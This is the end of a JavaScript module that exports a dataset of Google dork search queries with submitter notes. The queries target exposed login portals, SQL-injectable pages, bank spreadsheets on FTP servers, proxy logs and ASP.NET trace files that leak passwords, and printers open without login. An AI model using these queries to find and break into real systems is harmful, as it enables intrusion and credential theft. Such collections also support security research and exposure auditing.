Enjoy xD.Dork by Rootkit Pentester.", "submited": "2015-11-13", "request": "intitle:index.of.mail", "id": 4132}, {"short description": "intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl", "long description": "Numara Software FootPrints Logins", "submited": "2015-11-16", "request": "intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl", "id": 4133}, {"short description": "intext:\"Roundcube Webmail\" intitle:\"Welcome to Roundcube Webmail\" -site:roundcube.net", "long description": "Roundcube Webmail Login Portals.Decoy", "submited": "2015-11-19", "request": "intext:\"Roundcube Webmail\" intitle:\"Welcome to Roundcube Webmail\" -site:roundcube.net", "id": 4134}, {"short description": "intitle:Tomcat Status | inurl:/status?full=true", "long description": "JBOSS / Tomcat Status IP info-Xploit", "submited": "2015-11-19", "request": "intitle:Tomcat Status | inurl:/status?full=true", "id": 4135}, {"short description": "intitle:\"Mail - AfterLogic WebMail\"", "long description": "AfterLogic WebMail Login Portals.Decoy", "submited": "2015-11-19", "request": "intitle:\"Mail - AfterLogic WebMail\"", "id": 4136}, {"short description": "inurl:index.php?id= intext:\"mysql_fetch_array\"", "long description": "here's a dork to find sql injectable sites in general.inurl can be replaced to something different...thx,Denis Muhic", "submited": "2015-11-23", "request": "inurl:index.php?id= intext:\"mysql_fetch_array\"", "id": 4137}, {"short description": "-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank", "long description": "Lots of interesting stuff!Decoy", "submited": "2015-11-23", "request": "-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank", "id": 4138}, {"short description": "inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm", "long description": "Dork who show cams of traffic of a lot of cities.Dork By Rootkit Pentester.", "submited": "2015-11-26", "request": "inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm", "id": 4139}, 
{"short description": "intext:\"GET http://\" ext:txt intext:\"password\" inurl:log", "long description": "this dork will return password sent in GET request from proxies logs.submitted by: Mohammad Al-Nasser", "submited": "2015-11-30", "request": "intext:\"GET http://\" ext:txt intext:\"password\" inurl:log", "id": 4140}, {"short description": "inurl:net/net/airprint.html", "long description": "Title: inurl:net/net/airprint.htmlDescription : This dork can access many printers without login.By Sivabalan", "submited": "2015-11-30", "request": "inurl:net/net/airprint.html", "id": 4141}, {"short description": "inurl:/net/net/protocol.html", "long description": "Title: inurl:/net/net/protocol.htmlDescription: This dork can access many printers without loginBy Sivabalan", "submited": "2015-11-30", "request": "inurl:/net/net/protocol.html", "id": 4142}, {"short description": "inurl:\"trace\" ext:axd intext:\"password\"", "long description": "the dork keyword is:inurl:\"trace\" ext:axd intext:\"password\"purpose of dork:search for tracing files in the ASP.NET websites which might contain asensitive information such as the username and password entered to theapplication.discovered by: Asem Al Husaini (SFDA)", "submited": "2015-12-01", "request": "inurl:\"trace\" ext:axd intext:\"password\"", "id": 4143}]
};
// Export the dataset object. Its `data` array holds one record per entry with
// the keys "short description", "long description", "submited", "request"
// (all strings) and "id" (a number). The key is spelled "submited" in every
// record, so consumers must look it up with that exact spelling.
// NOTE(review): the string fields are free-form text copied from a third-party
// collection (search queries, submitter notes, embedded URLs). Treat them as
// untrusted data: escape them when rendering, and do not auto-link the URLs or
// submit the "request" values anywhere automatically.
module.exports = db;